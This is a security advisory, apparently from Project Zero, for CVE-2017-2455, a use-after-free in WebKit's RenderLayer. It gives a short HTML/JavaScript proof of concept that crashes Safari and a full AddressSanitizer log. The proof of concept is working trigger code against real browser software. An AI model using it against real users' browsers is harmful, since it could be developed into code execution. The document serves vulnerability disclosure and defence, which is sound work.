WebKit RenderLayer Use-After-Free

WebKit suffers from a use-after-free vulnerability in RenderLayer.


MD5 | 45cf8b61f2591d239bb8a664e2ddff83

 WebKit: use-after-free in RenderLayer 

CVE-2017-2455


There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the latest nightly build of WebKit. The PoC also crashes Safari 10.0.2 on Mac.

PoC and ASan log follow

PoC:

=================================================================

<script>

function go() {
div.style.setProperty("-webkit-flow-into", "foo");
document.execCommand("fontSize", false, 6);
window.requestAnimationFrame(cb);
h1.attachShadow({mode: "open"});
h1.replaceWith("foo");
}

function cb() {
var a;
//trigger garbage collector
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
textarea.cols = 1;
}

</script>
<body onload=go()>
<textarea id="textarea"></textarea>
<h1 id="h1">
<div id="div" style="perspective: 1px;">

=================================================================

ASan log:

=================================================================
==531==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800003e340 at pc 0x00010b23f5ab bp 0x7fff5c243c10 sp 0x7fff5c243c08
READ of size 8 at 0x60800003e340 thread T0
#0 0x10b23f5aa in WebCore::Node::treeScope() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x45aa)
#1 0x10b23f568 in WebCore::Node::document() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x4568)
#2 0x10b23eb18 in WebCore::RenderObject::document() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3b18)
#3 0x10d3e9a34 in WebCore::RenderBox::applyTopLeftLocationOffset(WebCore::LayoutPoint&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21aea34)
#4 0x10d3e2bc1 in WebCore::RenderLayer::updateLayerPosition() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a7bc1)
#5 0x10d3e1fb8 in WebCore::RenderLayer::updateLayerPositions(WebCore::RenderGeometryMap*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a6fb8)
#6 0x10d3e24cd in WebCore::RenderLayer::updateLayerPositions(WebCore::RenderGeometryMap*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a74cd)
#7 0x10d3e24cd in WebCore::RenderLayer::updateLayerPositions(WebCore::RenderGeometryMap*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a74cd)
#8 0x10d3e1e66 in WebCore::RenderLayer::updateLayerPositionsAfterLayout(WebCore::RenderLayer const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a6e66)
#9 0x10bcdbb66 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0b66)
#10 0x10dc5c1c1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a211c1)
#11 0x10cebc87f in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c8187f)
#12 0x7fff9a634af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)
#13 0x7fff9a634782 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92782)
#14 0x7fff9a6342d9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x922d9)
#15 0x7fff9a62b7d0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x897d0)
#16 0x7fff9a62ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#17 0x7fff904ba934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#18 0x7fff904ba76e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#19 0x7fff904ba5ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#20 0x7fff8e2e5df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#21 0x7fff8e2e5225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#22 0x7fff8e2d9d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#23 0x7fff8e2a3367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#24 0x7fff86665193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#25 0x7fff86663bbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#26 0x1039b9b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#27 0x7fff8e1e35ac in start (/usr/lib/system/libdyld.dylib+0x35ac)

0x60800003e340 is located 32 bytes inside of 96-byte region [0x60800003e320,0x60800003e380)
freed by thread T0 here:
#0 0x105f85cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x108fb036f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)
#2 0x10b5e3653 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3a8653)
#3 0x10b5d0752 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x395752)
#4 0x10be98aad in WebCore::HTMLHeadingElement::~HTMLHeadingElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc5daad)
#5 0x1088a1ee7 in JSC::JSCell::callDestructor(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x11f2ee7)
#6 0x1089a423a in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1>()::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f523a)
#7 0x1089a3f1e in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1>() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f4f1e)
#8 0x1089a3892 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectMarksMode<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1>() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f4892)
#9 0x1089a2212 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectSweepMode<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f3212)
#10 0x10899f823 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectHasNewlyAllocated<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f0823)
#11 0x10899a130 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectEmptyMode<(JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12eb130)
#12 0x108987f80 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectScribbleMode<(JSC::MarkedBlock::Handle::SweepDestructionMode)1>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d8f80)
#13 0x108987dfc in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d8dfc)
#14 0x108983c54 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d4c54)
#15 0x1089836a8 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d46a8)
#16 0x10898450e in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d550e)
#17 0x1076c3bfa in void* JSC::allocateCell<JSC::JSString>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x14bfa)
#18 0x1076c3758 in JSC::JSString::create(JSC::VM&, WTF::PassRefPtr<WTF::StringImpl>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x14758)
#19 0x1076c3465 in JSC::jsString(JSC::VM*, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x14465)
#20 0x10871d864 in JSC::JSFunction::finishCreation(JSC::VM&, JSC::NativeExecutable*, int, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x106e864)
#21 0x10871d6fd in JSC::JSFunction::create(JSC::VM&, JSC::JSGlobalObject*, int, WTF::String const&, long long (*)(JSC::ExecState*), JSC::Intrinsic, long long (*)(JSC::ExecState*), JSC::DOMJIT::Signature const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x106e6fd)
#22 0x1087b2802 in JSC::JSObject::putDirectNativeFunction(JSC::VM&, JSC::JSGlobalObject*, JSC::PropertyName const&, unsigned int, long long (*)(JSC::ExecState*), JSC::Intrinsic, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1103802)
#23 0x10bb5bf3a in JSC::reifyStaticProperty(JSC::VM&, JSC::PropertyName const&, JSC::HashTableValue const&, JSC::JSObject&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x920f3a)
#24 0x10c2a4fc8 in void JSC::reifyStaticProperties<32u>(JSC::VM&, JSC::HashTableValue const (&) [32u], JSC::JSObject&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1069fc8)
#25 0x10c7ca738 in WebCore::JSHTMLTextAreaElementPrototype::finishCreation(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x158f738)
#26 0x10c7cab8b in WebCore::JSHTMLTextAreaElementPrototype::create(JSC::VM&, JSC::JSGlobalObject*, JSC::Structure*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x158fb8b)
#27 0x10c7caad5 in WebCore::JSHTMLTextAreaElement::createPrototype(JSC::VM&, JSC::JSGlobalObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x158fad5)
#28 0x10c6d7c6f in JSC::Structure* WebCore::getDOMStructure<WebCore::JSHTMLTextAreaElement>(JSC::VM&, WebCore::JSDOMGlobalObject&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x149cc6f)
#29 0x10c6d7a8d in std::__1::enable_if<std::is_same<WebCore::HTMLTextAreaElement, WebCore::HTMLTextAreaElement>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLTextAreaElement>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLTextAreaElement, WebCore::HTMLTextAreaElement>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLTextAreaElement>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x149ca8d)

previously allocated by thread T0 here:
#0 0x105f85790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff867345a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x108fb9db4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190adb4)
#3 0x108faf12b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190012b)
#4 0x108f46995 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1897995)
#5 0x10be4b45d in WebCore::HTMLDivElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1045d)
#6 0x10be67451 in WebCore::divConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2c451)
#7 0x10be65373 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2a373)
#8 0x10be22ea6 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe7ea6)
#9 0x10be221a5 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe71a5)
#10 0x10be228e6 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe78e6)
#11 0x10bf7ef63 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd43f63)
#12 0x10bf7c4d6 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd414d6)
#13 0x10bf7a67e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd3f67e)
#14 0x10be4fd48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#15 0x10be4f902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#16 0x10be4eb94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#17 0x10be5058d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#18 0x10b8bd661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
#19 0x10b9e91f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#20 0x10b9ad86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#21 0x10b48dfb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#22 0x10b488b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#23 0x10da397e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#24 0x1042af615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#25 0x1042aec2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#26 0x103c5d1f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#27 0x103a80448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#28 0x103a89614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#29 0x108f65ab3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6ab3)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x45aa) in WebCore::Node::treeScope() const
Shadow bytes around the buggy address:
0x1c1000007c10: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000007c20: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1000007c30: fa fa fa fa 00 00 00 00 00 00 00 fc fc 00 00 fa
0x1c1000007c40: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c1000007c50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
=>0x1c1000007c60: fa fa fa fa fd fd fd fd[fd]fd fd fd fd fd fd fd
0x1c1000007c70: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1000007c80: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000007c90: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000007ca0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000007cb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==531==ABORTING


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: ifratric


Related Posts